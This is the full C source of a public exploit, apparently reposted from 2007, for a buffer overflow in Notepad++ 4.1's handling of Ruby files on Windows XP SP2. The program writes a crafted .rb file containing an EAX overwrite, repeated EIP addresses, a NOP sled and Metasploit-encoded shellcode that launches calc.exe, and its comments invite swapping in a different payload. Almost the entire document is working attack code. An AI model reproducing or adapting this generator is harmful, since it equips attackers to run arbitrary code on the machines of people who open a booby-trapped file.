notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)
来源:v9@fakehalo.us 作者:vade79 发布时间:2007-05-14  
/*[ notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit. ]*
  *                                                                         *
  * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                        *
  *                                                                         *
  * compile:                                                                *
  *  gcc xnotepad++.c -o xnotepad++                                         *
  *                                                                         *
  * syntax:                                                                 *
  *  ./xnotepad++ [-xe] -f filename                                         *
  *                                                                         *
  * notepad++ homepage/url:                                                 *
  *  http://sourceforge.net/projects/notepad-plus/                          *
  *  http://notepad-plus.sourceforge.net/                                   *
  *                                                                         *
  * notepad++ contains a buffer overflow vulnerability in the way it        *
  * processes ruby source files (.rb).  this exploit works by overwriting   *
  * EAX which gets called during processing as "CALL DWORD EAX+4", so EAX   *
  * needs to point to a user-controlled area that contains another address  *
  * which will then become EIP.  once EIP is controlled it simply jumps a   *
  * little bit forward in memory to the nop sled/shellcode.                 *
  *                                                                         *
  * as of now, this will only be successful if the created file is opened   *
  * via "Edit with notepad++" on the file, not when opening a file from     *
  * inside notepad++.  this is mainly to prove this vulnerability can be    *
  * exploited.                                                              *
  *                                                                         *
  * exploitation method(file.rb):                                           *
  *  [FILLERx32][NEW_EAX][FILLERx128]\r\n                                   *
  *  # [NEW_EIPx1000][NOPSx4000][SHELLCODE]\r\n                             *
  *                                                                         *
  * (i was a bit liberal with the new_eip/shellcode space, can pretty much  *
  * make it as large as you like.  also, addresses with null-bytes are      *
  * allowed)                                                                *
  *                                                                         *
  * if successful, notepad++ will spawn calc.exe by default, swap the       *
  * shellcode out if you want a different result.  this was tested on winXP *
  * SP2 ENG, if it is something else the EAX/EIP addresses may need to be   *
  * fished out of memory in your favorite debugger.                         *
  ***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>

#define DFL_EAX 0x000fd47c /* winXP SP2 ENG */
#define DFL_EIP 0x000fe3d0 /* winXP SP2 ENG */

/* win32_exec -  EXITFUNC=thread CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
/* Stored as a string literal, so sizeof(x86_exec) is 165, not 164: write_rb()
 * copies the terminating NUL into the output file too.  Opaque payload bytes,
 * written verbatim; not reviewed here. */
static unsigned char x86_exec[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x19\x25\xc7\x83\xeb\xfc\xe2\xf4\x24\xf1\x61\xc7\xd8\x19\xae\x82"
"\xe4\x92\x59\xc2\xa0\x18\xca\x4c\x97\x01\xae\x98\xf8\x18\xce\x8e"
"\x53\x2d\xae\xc6\x36\x28\xe5\x5e\x74\x9d\xe5\xb3\xdf\xd8\xef\xca"
"\xd9\xdb\xce\x33\xe3\x4d\x01\xc3\xad\xfc\xae\x98\xfc\x18\xce\xa1"
"\x53\x15\x6e\x4c\x87\x05\x24\x2c\x53\x05\xae\xc6\x33\x90\x79\xe3"
"\xdc\xda\x14\x07\xbc\x92\x65\xf7\x5d\xd9\x5d\xcb\x53\x59\x29\x4c"
"\xa8\x05\x88\x4c\xb0\x11\xce\xce\x53\x99\x95\xc7\xd8\x19\xae\xaf"
"\xe4\x46\x14\x31\xb8\x4f\xac\x3f\x5b\xd9\x5e\x97\xb0\xf6\xeb\x27"
"\xb8\x71\xbd\x39\x52\x17\x72\x38\x3f\x7a\x44\xab\xbb\x37\x40\xbf"
"\xbd\x19\x25\xc7";

/* Run-time settings filled in by main().  File-scope storage, so tbl.file
 * starts out NULL, which main() relies on to detect a missing -f. */
struct{
unsigned int eax; /* written at file offset 32, minus 4 (see write_rb()) */
unsigned int eip; /* repeated 1000 times after the "\r\n# " marker */
char *file;       /* output path from strdup()/malloc() in main(); never freed, process exits */
}tbl;

/* lonely extern. */
extern char *optarg; /* set by getopt(); <unistd.h> already declares it, kept for clarity */

/* functions. */
/* write_rb: create `file` ("wb") with the layout from the header comment.
 * Returns 0 on success, 1 if fopen() fails. */
unsigned char write_rb(char *,unsigned int,unsigned int);
/* printe: print "[!] <err>" to stdout; exit(1) when e is non-zero. */
void printe(char *,short);
/* usage: print the option help with the current tbl.eax/tbl.eip values, then exit(0). */
void usage(char *);

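/* start.
 *
 * Option parsing for the generator:
 *   -f <file>  output path; ".rb" is appended unless the name already ends in
 *              ".rb" (case-insensitive).  Only the first -f is honoured.
 *   -x <hex>   replaces the default EAX value (DFL_EAX)
 *   -e <hex>   replaces the default EIP value (DFL_EIP)
 * Any other option, or a missing -f, goes to usage().  Allocation failure,
 * an unparsable -x/-e value, or a write_rb() failure exits 1 through printe().
 */
int main(int argc,char **argv){
    int chr=0;
    char *ext;

    printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over"
    "flow exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
    "\n\n");

    tbl.eax=DFL_EAX;
    tbl.eip=DFL_EIP;

    /* getopt() is specified to return -1, not EOF, when the options run out
     * (they coincide on common libcs, which is why the old loop worked). */
    while((chr=getopt(argc,argv,"f:x:e:"))!=-1){
        switch(chr){
        case 'f':
            if(tbl.file)break; /* first -f wins, as before */
            ext=strrchr(optarg,'.'); /* standard spelling of rindex() */
            if(ext&&!strcasecmp(ext,".rb")){
                if(!(tbl.file=strdup(optarg)))
                    printe("main(): allocating memory failed",1);
            }
            else{
                size_t len=strlen(optarg)+4; /* name + ".rb" + NUL */
                if(!(tbl.file=malloc(len)))
                    printe("main(): allocating memory failed",1);
                snprintf(tbl.file,len,"%s.rb",optarg);
            }
            break;
        case 'x':
            /* sscanf() leaves tbl.eax untouched on a parse failure; report it
             * instead of silently keeping the default. */
            if(sscanf(optarg,"%x",&tbl.eax)!=1)
                printe("main(): -x expects a hexadecimal address",1);
            break;
        case 'e':
            if(sscanf(optarg,"%x",&tbl.eip)!=1)
                printe("main(): -e expects a hexadecimal address",1);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    if(!tbl.file)usage(argv[0]);

    printf("[*] filename:\t\t\t%s\n",tbl.file);
    printf("[*] EAX address:\t\t0x%.8x\n",tbl.eax);
    printf("[*] EIP address:\t\t0x%.8x\n\n",tbl.eip);

    if(write_rb(tbl.file,tbl.eax,tbl.eip))
        printe("failed to write to file.",1);
    exit(0);
}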

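/* write_rb helper: write `count` copies of the `size`-byte object at `unit`.
 * Returns 0 when every copy was written, non-zero on the first short write. */
static int put_repeat(FILE *fs,const void *unit,size_t size,unsigned int count){
    unsigned int i;
    for(i=0;i<count;i++){
        if(fwrite(unit,size,1,fs)!=1)return(1);
    }
    return(0);
}

/* write the ruby file.
 *
 * Emits the layout from the header comment:
 *   [filler x32][eax-4][filler x128]"\r\n# "[eip x1000][0x90 x4000][x86_exec]"\r\n"
 * file:    path to create/truncate ("wb").
 * eax/eip: written as raw 4-byte unsigned ints in host byte order
 *          (NOTE(review): the output therefore depends on the build host's
 *          endianness — build on a little-endian host for an x86 target).
 * Returns 0 on success, 1 if the file cannot be opened, any write is short,
 * or fclose() fails (that is where buffered data actually reaches the disk).
 * sizeof(x86_exec) includes the string literal's terminating NUL, as before.
 */
unsigned char write_rb(char *file,unsigned int eax,unsigned int eip){
    unsigned int real_eax=eax-4; /* "CALL DWORD EAX+4" adds the 4 back */
    unsigned char filler='x';
    unsigned char nop=0x90;
    FILE *fs=fopen(file,"wb");
    if(!fs)return(1);

    if(put_repeat(fs,&filler,1,32)
     /* EAX overwrite, "CALL DWORD EAX+4" will be processed. */
     ||fwrite(&real_eax,4,1,fs)!=1
     ||put_repeat(fs,&filler,1,128)
     /* from here on will be commented out, but loaded into memory. */
     ||fwrite("\r\n# ",4,1,fs)!=1
     /* EAX overwrite will point here, and change the EIP to this. */
     ||put_repeat(fs,&eip,4,1000)
     /* EIP from above will point into this nop sled. */
     ||put_repeat(fs,&nop,1,4000)
     ||fwrite(x86_exec,sizeof(x86_exec),1,fs)!=1
     ||fwrite("\r\n",2,1,fs)!=1){
        fclose(fs); /* already failing; the close status adds nothing */
        return(1);
    }
    /* fclose() flushes the stdio buffer; a failure here means a truncated file. */
    if(fclose(fs)!=0)return(1);
    return(0);
}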

/* error!
 * Print `err` prefixed with "[!]" on stdout.  When `e` is non-zero the
 * process terminates with status 1; otherwise control returns to the caller. */
void printe(char *err,short e){
    fprintf(stdout,"[!] %s\n",err);
    if(e!=0){
        exit(1);
    }
}

/* usage.
 * Print the command-line help, showing whatever tbl.eax/tbl.eip currently
 * hold as the displayed defaults, then exit with status 0. */
void usage(char *progname){
    fprintf(stdout,"syntax: %s [-xe] -f filename\n\n",progname);
    fputs("  -f <file>\tfilename to output.\n",stdout);
    fprintf(stdout,
            "  -x <addr>\tEAX address, points to new EIP address in memory (0x%.8x)\n",
            tbl.eax);
    fprintf(stdout,
            "  -e <addr>\tEIP address, points to NOPS/shellcode (0x%.8x)\n\n",
            tbl.eip);
    exit(0);
}

 